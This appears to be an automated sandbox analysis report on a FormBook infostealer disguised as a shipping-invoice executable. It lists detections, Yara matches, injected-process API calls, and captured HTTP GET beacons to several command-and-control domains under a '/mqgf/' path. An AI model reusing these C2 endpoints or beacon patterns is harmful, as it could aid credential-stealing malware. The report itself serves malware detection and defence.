http://www.gettingthehelloutofca.com/mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0	true	Avira URL Cloud: safe	unknown
http://www.wtmailer15.com/mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0	true	Avira URL Cloud: safe	unknown
http://www.hvcharging.com/mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0	true	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Prehnite.dll

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: Shipping INVOICE-BL Shipment..exe	Virustotal: Detection: 27%			Perma Link
Source: Shipping INVOICE-BL Shipment..exe	ReversingLabs: Detection: 44%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.cmd.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00406469 FindFirstFileA,FindClose,	0_2_00406469
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040592E

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	2_2_00416227
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi	2_2_0040C37F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop esi	2_2_004157F1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	9_2_02F76227
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	9_2_02F6C37F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop esi	9_2_02F757F1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 192.0.78.24 192.0.78.24
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.carnesveymacr.com

Source: global traffic

Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Shipping INVOICE-BL Shipment..exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Shipping INVOICE-BL Shipment..exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nse53A7.tmp.0.dr	String found in binary or memory: http://openoffice.org/2001/block-list
Source: explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: nse53A7.tmp.0.dr	String found in binary or memory: http://www.businessobjects.com0
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: nse53A7.tmp.0.dr	String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

0_2_004053CB

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Source: Shipping INVOICE-BL Shipment..exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Shipping INVOICE-BL Shipment..exe

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00418180 NtCreateFile,	2_2_00418180
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00418230 NtReadFile,	2_2_00418230
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_004182B0 NtClose,	2_2_004182B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041817A NtCreateFile,	2_2_0041817A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_004182DA NtClose,	2_2_004182DA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_004182AC NtClose,	2_2_004182AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B795D0 NtClose,LdrInitializeThunk,	2_2_04B795D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79540 NtReadFile,LdrInitializeThunk,	2_2_04B79540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_04B796E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_04B797A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79780 NtMapViewOfSection,LdrInitializeThunk,	2_2_04B79780
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79FE0 NtCreateMutant,LdrInitializeThunk,	2_2_04B79FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79710 NtQueryInformationToken,LdrInitializeThunk,	2_2_04B79710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_04B79860
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79840 NtDelayExecution,LdrInitializeThunk,	2_2_04B79840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B799A0 NtCreateSection,LdrInitializeThunk,	2_2_04B799A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_04B79910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A20 NtResumeThread,LdrInitializeThunk,	2_2_04B79A20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A50 NtCreateFile,LdrInitializeThunk,	2_2_04B79A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B795F0 NtQueryInformationFile,	2_2_04B795F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7AD30 NtSetContextThread,	2_2_04B7AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79520 NtWaitForSingleObject,	2_2_04B79520
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79560 NtWriteFile,	2_2_04B79560
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B796D0 NtCreateKey,	2_2_04B796D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79610 NtEnumerateValueKey,	2_2_04B79610
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79670 NtQueryInformationProcess,	2_2_04B79670
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79660 NtAllocateVirtualMemory,	2_2_04B79660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79650 NtQueryValueKey,	2_2_04B79650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79730 NtQueryVirtualMemory,	2_2_04B79730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7A710 NtOpenProcessToken,	2_2_04B7A710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79770 NtSetInformationFile,	2_2_04B79770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7A770 NtOpenThread,	2_2_04B7A770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79760 NtOpenProcess,	2_2_04B79760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B798A0 NtWriteVirtualMemory,	2_2_04B798A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B798F0 NtReadVirtualMemory,	2_2_04B798F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79820 NtEnumerateKey,	2_2_04B79820
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7B040 NtSuspendThread,	2_2_04B7B040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B799D0 NtCreateProcessEx,	2_2_04B799D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79950 NtQueueApcThread,	2_2_04B79950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A80 NtOpenDirectoryObject,	2_2_04B79A80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A10 NtQuerySection,	2_2_04B79A10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79A00 NtProtectVirtualMemory,	2_2_04B79A00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B7A3B0 NtGetContextThread,	2_2_04B7A3B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B79B00 NtSetValueKey,	2_2_04B79B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_008054E0 NtDelayExecution,	2_2_008054E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0080318C NtWriteVirtualMemory,	2_2_0080318C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A50 NtCreateFile,LdrInitializeThunk,	9_2_03749A50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03749910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037499A0 NtCreateSection,LdrInitializeThunk,	9_2_037499A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03749860
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749840 NtDelayExecution,LdrInitializeThunk,	9_2_03749840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749710 NtQueryInformationToken,LdrInitializeThunk,	9_2_03749710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749FE0 NtCreateMutant,LdrInitializeThunk,	9_2_03749FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749780 NtMapViewOfSection,LdrInitializeThunk,	9_2_03749780
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037496E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_037496E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037496D0 NtCreateKey,LdrInitializeThunk,	9_2_037496D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749540 NtReadFile,LdrInitializeThunk,	9_2_03749540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037495D0 NtClose,LdrInitializeThunk,	9_2_037495D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749B00 NtSetValueKey,	9_2_03749B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374A3B0 NtGetContextThread,	9_2_0374A3B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A20 NtResumeThread,	9_2_03749A20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A10 NtQuerySection,	9_2_03749A10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A00 NtProtectVirtualMemory,	9_2_03749A00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749A80 NtOpenDirectoryObject,	9_2_03749A80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749950 NtQueueApcThread,	9_2_03749950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037499D0 NtCreateProcessEx,	9_2_037499D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374B040 NtSuspendThread,	9_2_0374B040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749820 NtEnumerateKey,	9_2_03749820
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037498F0 NtReadVirtualMemory,	9_2_037498F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037498A0 NtWriteVirtualMemory,	9_2_037498A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374A770 NtOpenThread,	9_2_0374A770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749770 NtSetInformationFile,	9_2_03749770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749760 NtOpenProcess,	9_2_03749760
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749730 NtQueryVirtualMemory,	9_2_03749730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374A710 NtOpenProcessToken,	9_2_0374A710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037497A0 NtUnmapViewOfSection,	9_2_037497A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749670 NtQueryInformationProcess,	9_2_03749670
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749660 NtAllocateVirtualMemory,	9_2_03749660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749650 NtQueryValueKey,	9_2_03749650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749610 NtEnumerateValueKey,	9_2_03749610
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749560 NtWriteFile,	9_2_03749560
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374AD30 NtSetContextThread,	9_2_0374AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749520 NtWaitForSingleObject,	9_2_03749520
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037495F0 NtQueryInformationFile,	9_2_037495F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F782B0 NtClose,	9_2_02F782B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F78230 NtReadFile,	9_2_02F78230
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F78180 NtCreateFile,	9_2_02F78180
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F782DA NtClose,	9_2_02F782DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F782AC NtClose,	9_2_02F782AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7817A NtCreateFile,	9_2_02F7817A

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

0_2_004033A9

Detected potential crypto function

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00406943	0_2_00406943
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_0040711A	0_2_0040711A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10001BB0	1_2_10001BB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10004700	1_2_10004700
